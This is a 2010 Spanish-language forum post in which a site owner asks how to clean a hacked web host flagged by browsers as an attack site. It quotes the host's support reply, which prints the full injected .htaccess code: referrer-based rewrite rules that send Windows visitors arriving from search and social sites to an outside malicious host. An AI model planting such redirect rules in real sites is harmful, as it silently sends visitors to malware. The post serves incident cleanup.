Foros del Web - Ver Mensaje Individual

lluc · #1 (**permalink**) 22/11/2010, 12:09

Hola:
Lo primero de todo, para los moderadores, es decir que no se si esta pregunta está bien puesta aquí...Es que he visto que en el foro de virus y troyanos todo son dudas sobre como proteger o limpiar el pc...y mi problema está en "mi sitio", no en mi pc. Si la pregunta está en el lugar equivocado, cambiarla de sección y por favor decidme donde la habéis puesto.
Gracias.

Mi consulta es...
Tengo un sitio alojado en WebHostingBuzz. Lo uso sólo para almacenar fotografías y vídeos para enseñárselos a los amigos.
Desde hace un mes Firefox advierte de que mio sitio es una "web atacante".
Me puse en contacto con el servicio técnico del host, me escanearon el sitio y me dijeron que no encontraron ningún virus:

Código:

We have scanned your catalogue  public_html  with the help of ClamAv for viruses and malware. Please find the results below:
---------------------------------------------------
[root@ss4 public_html]# clamscan -ir ./

----------- SCAN SUMMARY -----------
Known viruses: 823107
Engine version: 0.95.3
Scanned directories: 680
Scanned files: 150083
Infected files: 0
Data scanned: 11531.53 MB
Data read: 11692.98 MB (ratio 0.99:1)
Time: 2959.362 sec (49 m 19 s)
---------------------------------------------------

If you are sure that your content does not contain any viruses, please send an inquiry for your site re-rating using Google Webmaster Tools. If nothing is found, the warning screen will be removed

Pero el Firefox seguía bloqueando la entrada y decía que el sitio aún era "sospechoso".
Me puse en contacto con el soporte de WHB y me volvieron a escanear el sitio y me dijeron esto:

Código:

Dear Customer,

I have found what exactly has been hacked on your site. In your .htaccess file the following redirects have been implemented, you can see them below. I renamed your .htaccess file to .htaccess_old. Now you need to change all your passwords and check your computer for viruses. Also you need to contact google support team in order to whitelist your site.


ErrorDocument 500 http://ns2.onlyyoulifestyle.com/main.php?i=J8iuj9sdq/2ljBj7U8tOzpkXoQ==&e=0
ErrorDocument 502 http://ns2.onlyyoulifestyle.com/main.php?i=J8iuj9sdq/2ljBj7U8tOzpkXoQ==&e=2
ErrorDocument 403 http://ns2.onlyyoulifestyle.com/main.php?i=J8iuj9sdq/2ljBj7U8tOzpkXoQ==&e=3

RewriteEngine On

RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*odnoklassniki.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*vkontakte.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*tube.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*blogger.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*baidu.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*qq\.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*myspace.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*twitter.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*facebook.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*amazon.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ebay.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*linkedin.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*flickr.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*livejasmin.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*soso.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*doubleclick.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*pornhub.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*orkut.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*livejournal.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*wordpress.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC]

RewriteCond %{HTTP_USER_AGENT} .*Windows.*
RewriteRule .* http://ns2.onlyyoulifestyle.com/main.php?h=%{HTTP_HOST}&i=J8iuj9sdq/2ljBj7U8tOzpkXoQ==&e=r [R,L]

RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png$
RewriteCond %{HTTP_USER_AGENT} .*Windows.*
RewriteRule .* http://ns2.onlyyoulifestyle.com/main.php?h=%{HTTP_HOST}&i=J8iuj9sdq/2ljBj7U8tOzpkXoQ==&e=4 [R,L]

Y me lo limpiaron...Me crearon un htaccess nuevo, y me renombraron el viejo como htacccess_old.

Pero el sitio seguía siendo "sospechoso" para Google...Y los del soporte me dijeron que hiciera un backup y escaneara a fondo el sitio, buscando scripts to onlyyoulifestyle y el optro sitio raro...y los borrara.

MI CONSULTA ES...
He encontrado en muchos archivos htaccess, en carpetas y subcarpetas, lo mismo, exactamente igual, que lo que pongo en el "code" anterior.

¿Qué debo hacer?
¿Borrar todo eso y dejar los htaccess limpios y en blanco? ¿se pueden quedar en blanco?
¿Debo de buscar en otros tipos de archivos o sólo en los de texto?
¿Debo de tener cuidado al borrar estos archivos, eliminar estos textos...Es que tengo miedo de borrar algo importante por error.
Y por último...¡¡¿¿Como coño ha llegado esto hasta mi host??!! ¡¡¿¿Lo he "subido" yo sin querer??!!

Por favor, ¿puede alguien ayudarme...y explicármelo...porque soy bastante ignorante en estos temas.

Gracias, y perdonad si la pregunta no está en el sitio adecuado.
Un saludo
ll